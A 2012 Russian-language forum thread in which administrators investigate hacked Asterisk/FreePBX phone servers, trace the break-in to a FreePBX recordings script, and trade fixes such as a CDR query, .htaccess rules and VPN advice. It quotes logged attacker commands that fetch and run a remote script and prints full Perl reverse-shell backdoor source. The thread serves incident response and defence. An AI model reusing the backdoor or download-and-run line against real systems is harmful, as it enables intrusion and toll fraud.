вломали пару атс. версия астериска 1.8.7.0
в логах cdr вот такая фигня.
system (echo Fucked> /var/www/html/recordings/misc/x )
внимаение вопрос. как запустили команду system?
вот другой пример
рекомендую всем проверить сдр на предмет lastapp='system'. ибо в нормальной фрипбкс такого нету. mysql> select * from asteriskcdrdb.cdr where lastapp='system' -> ; +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ | calldate | clid | src | dst | dcontext | channel | dstchannel | lastapp | lastdata | duration | billsec | disposition | amaflags | accountcode | uniqueid | userfield | +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ | 2012-04-06 02:20:11 | | | 98 | from-internal | Local/98@from-internal-a155;1 | | System | wget http://80.68.94.143/dc -O /tmp/dc;perl /tmp/dc 80.68.94.143 3000 | 0 | 0 | ANSWERED | 3 | | 1333664411.20963 | | | 2012-04-07 23:31:34 | | | 98 | from-internal | Local/98@from-internal-1655;1 | | System | wget http://80.68.94.143/dc -O /tmp/dc;perl /tmp/dc 80.68.94.143 3000 | 1 | 1 | ANSWERED | 3 | | 1333827094.22524 | | +---------------------+------+-----+-----+---------------+--------------------------------+------------+---------+-----------------------------------------------------------------------+----------+---------+-------------+----------+-------------+------------------+-----------+ 2 rows in set (0.01 sec)
самое интересно что нет src вообще
Запустили через /var/www/html/recordings/misc/callme_page.php .
Так что закрывайте доступ к этой директории.
sed -i 's/\(<?php\)/\1\nexit;/' /var/www/html/recordings/misc/callme_page.php
echo -e "Order allow,deny \nDeny from all" >> /var/www/html/recordings/.htaccess
так там же авторизация. не могу закрытьэто основное свойства данной пары.
meral ( 2012-04-08 20:37:20 +0400 )редактироватьпереработать скрипт, усилить всю безопасность, ограничить ойпишнеки
um2010 ( 2012-04-08 21:20:30 +0400 )редактироватьну пока поменял путь к этой директории и убрал апач поставил nginx через https с доступом только к конкретной диерктории.
meral ( 2012-04-08 21:50:05 +0400 )редактироватьа может не стоит выставлять в дикий нет, столько потенциально дырявого софта? делайте простенькие sbc, где доступны 3-4 порта (Os+asterisk\freeswith+fail2ban или pfsense+freeswitch)..
это был риторический вопрос? freeswitch я бы вообще в нет не выставлял.
meral ( 2012-04-10 14:23:42 +0400 )редактироватьэто ценный совет и походу самый действенный, если даже ты не уберегся от ломателей...
svoy ( 2012-04-10 14:42:24 +0400 )редактироватьгы. порсто нет смысла тратить время на защиту от взлома на впсках по 20 евро в месяц. и я какбы не специалист по безопасности.
meral ( 2012-04-11 09:36:46 +0400 )редактироватьно претензии ведь к тебе будут, что не предостерег от глупого выбора заказчика ;) сливают ведь не на 20 евро..
svoy ( 2012-04-11 10:24:25 +0400 )редактироватьhttp://seclists.org/fulldisclosure/2012/Mar/234
Уязвимость найдена в FrePBX версий 2.6-2.10
Че-то тоскливо как-то становится, вторая уязвимость за месяц, позволяющая утащить все. Месяц назад выплыл баг в vTiger http://elastix.org/index.php/en/component/kunena/116-security/98468-vtiger-vulnerability.html.
Имхо, для всех коробок, хоть как-то смотрящих в инет надо в .htaccess добавлять что-то вроде:
AuthUserFile /var/www/.htpasswd
AuthType Basic
AuthName "Enter login and password"
Require valid-user
Order deny,allow
Deny from all
Allow from <trusted IP's>
Satisfy Any
иначе заклюют...
Возможно через Manager.
Покажите
netstat -nltup|grep asterisk
менеджер только на локалхост открыт. или в нем уязвимость есть?
meral ( 2012-04-08 12:35:33 +0400 )редактироватьНе понял ответа сначала. Если только на локалхост, то уже неважно, есть уязвимости в самом менеджере или нет.
ro ( 2012-04-08 14:28:19 +0400 )редактироватьАТС как то связаны между собой?
Троянчик worsyn скачивает такую херь:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
собственно после чего, он может сделать всё что хошь.. такой радмин получается
залазим, к примеу, так: http://www.chovy.com/personal/simiens-crew-2005-how-they-did-it/
да троянчика я прочитал уже. меня интересует что мне сделать чтоб эту дырку закрыть.а именно КАК они его вызвали то.
meral ( 2012-04-08 13:47:35 +0400 )редактироватьВыше ответ. ломают повально через Recordings .Скачивают бекдор запускают и проксиуют трафик. всё просто.
zzuz ( 2012-04-08 14:44:33 +0400 )редактироватьМеня, на этой католическо-пасхальной неделе, fail2ban заваливает письмами о попытках перебора аккаунтов. Всегда на праздниках оживляются совлочи,....
alphil ( 2012-04-08 20:04:25 +0400 )редактироватьА полнее то строчка сдр какая? И нет ли на серваке wordpress ?
нет.чистый астериск и фрипбкс. полная строчка странная. похоже на запуск call-скриптом.
meral ( 2012-04-08 12:35:18 +0400 )редактироватьэто worsyn троян, лезет через уязвимости httpб не исключено, что через морду freepbx
um2010 ( 2012-04-08 13:20:24 +0400 )редактироватьhttp://www.chovy.com/personal/simiens-crew-2005-how-they-did-it/ а вот и инструкция-пример как влезть
um2010 ( 2012-04-08 13:32:39 +0400 )редактироватьВот рассказывал мне кто-то не так давно про разные системы обнаружения вторжений и fail2ban-ы... Если внешние коннекты к АТСке идут со статики - то я режу айпишники фаерволом, если таких много и откуда угодно - то ВПН и не морочить яйца. Есессно защиту от перебора паролей ВПНа никто не отменял, но так никто не увидит что у вас сип наружу торчит
ну так ты крут. только вот чето мои клиенты не хотят так. не знаешь чего? и никто ничего не перебирал. просто взяли и в одно действие взломали.
meral ( 2012-04-12 18:56:06 +0400 )редактироватьТам такой же админ прошаренный сидел , фильтровал всё по портам)
zzuz ( 2012-04-12 19:02:49 +0400 )редактироватьА не пробовали объяснять что вываливание порта наружу чревато потерей бабок? Видимо поломали не в 1 действие, просто просканили грамотно. Клиент того же ППТП ВПН есть практически в любой системе, и айфонах, и на винде, и на линухах, везде. Настроить сервер пптп - 5 минут. Порезать айпишники - тоже несложно. А различные системы обнаружения спасают разве что в случае публичных веб и фтп серверов, когда пользователей огромное кол-во и они не авторизовываются. А вываливать порт астериски наружу и надеяться на то что атаку обнаружат - это как бороться с поносом, ограничивая доступ в сортир. Целенаправленный взлом в этом случае - вопрос времени. А если у вас ещё и веб-морда торчит наружу, то очень недолгого времени
asdev ( 2012-04-13 09:06:37 +0400 )редактироватьчукча писатель? прочитай вот написано как поломали. в логах http сервера нет никаких подборов. у меня имеенно публичная сервер. еще и не мой а клиента. а еще у клиента КОРОБОЧКИ на динамических адресах. какое нафиг pptp? вообще возникакет впечатление что вы нкиогда с частными клиентами не работали.
meral ( 2012-04-13 11:53:48 +0400 )редактироватьЯ писал про возможность подбора впн паролей. А просканить диапазон айпишников на предмет наличия какого-то дырявого пхп файла - нех делать, вы и не заметите этого, т.к. это и не скан вовсе, если сервер публичный и к веб-морде имеют доступ много народа. Коробочки на динамических адресах имеют прямой доступ в инет? Установка между коробочкой и каналом инета любого роутера за 20-30 уе уже позволит поднять впн канал, кроме того, многие коробочки умеют ПППоЕ, сервер которого тоже можно поднять. Если сервер публичный - что там ещё крутится? Или астериск у вас - публичный? С доступом всем?
asdev ( 2012-04-13 12:07:04 +0400 )редактироватьнет.ну точно маленький.коробочка 30 баксиков.давайте перед нет еще на 30 поставим роутер. коробочки дома у сотрудников. какой может быть там pppoe? и да, представте у коробочек ДИНАМИЧЕСКИЕ адреса. и мне они НЕИзВЕСТНЫ заранее.
meral ( 2012-04-13 15:09:12 +0400 )редактироватьвсе. больше не отвечают. астериск не является корпоративным свичем.он вот как раз на частников расчитан которые ничего за "всего 30 уе" усложняющего установку "всего на полчаса работы админа" ставить не будут.
meral ( 2012-04-13 15:10:50 +0400 )редактироватьА что за коробочки? Модели есть? В случае ВПН подключения пофигу какие у коробочек адреса, т.к. им назначаются адреса ВПН сети и сам сервер маршрутизирует на них траффик. Грубо говоря, если у вас на телефоне есть сип-звонилка и впн клиент, вы поехали в другую страну, подключились в ближайшем макдаке к вайфаю, и к впн серверу - у вас будет внутренний статический айпишник впн сети, который выдаётся сервером по вашему логину/паролю
asdev ( 2012-04-13 16:14:14 +0400 )редактироватьДа нормуль. Не парься . Это обычный тролль. Из тех кто постоянно философствует , а потом пишет на форумах "не могу зарегестрировать транк от Манго офиса...".
zzuz ( 2012-04-13 18:32:34 +0400 )редактироватьЗадан: 2012-04-08 11:43:44 +0400
Просмотрен: 3,393 раз
Обновлен: Apr 12 '12
Проект компании "АТС Дизайн"
Asterisk® и Digium® являются зарегистрированными торговыми марками компании
Digium, Inc., США.
IP АТС Asterisk распространяется под лицензией
GNU GPL.
А в логах-то что???
switch ( 2012-04-08 13:32:20 +0400 )редактироватьда в том то и дело что ничего особенного. ну после взлома слив ттрафика на платные номера.
meral ( 2012-04-08 13:48:55 +0400 )редактироватьСервер смотрел наружу сетевым интерфейсом?
switch ( 2012-04-08 14:04:08 +0400 )редактироватьэпический вопрос, в духе: а сервер был включен в розетку?
um2010 ( 2012-04-08 20:30:20 +0400 )редактироватьсервер был сам снаружи.
meral ( 2012-04-08 20:36:06 +0400 )редактировать